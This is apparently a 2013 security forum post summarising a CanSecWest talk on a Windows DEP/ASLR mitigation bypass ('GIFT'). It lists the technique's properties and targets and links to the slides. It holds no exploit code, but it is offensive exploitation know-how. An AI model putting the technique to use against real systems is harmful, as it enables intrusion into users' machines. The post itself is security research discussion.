DEP ASLR bypass without ROP JIT : CanSecWest2013 Slides and Analysis
by
, 03-08-2013 at 06:03 AM (19944 Views)
I have my own talk from CanSecwest to blog about but this one is more interesting and the most awaited one. So here are the slides, I will add my own analysis and test cases to this blog entry later. Interesting thing is we had this technique discussed on garage in november http://www.garage4hackers.com/f22/wi...innu-3080.html .
Yu Yang @tombkeeper did a demo of the technique on Ms013-08 and it does not ever need a heap spray for his ASLR/DEP bypass technique .
And the exploit is scary, its a quick kaboom with out heap spray.
He calls this method GIFT [ Got it form a table] .
The simple technique is to change the VFT of wow64sharedinformation and it's ptr.
Here are couple of quick notes on the bypass Technique :
Good news about the Technique:.
- Totally ASLR/DEP free
- Language/SP independent
- Work on almost all use-after-free/vtable-overflow
- Target on IE, firefox, pdf reader, flash, office …
- Even don’t need shellcode
- Sometimes don’t need heapspray
- Need a Windows file sharing server
- It is not a real problem
- Only work on 32-bit process in x64 Windows
- This situation is very common
- Can not work on Windows 8
The documents and presentation is from Yu Yang @tombkeeper
Download Slides from here:
https://docs.google.com/file/d/0B46U...it?usp=sharing
Cheers.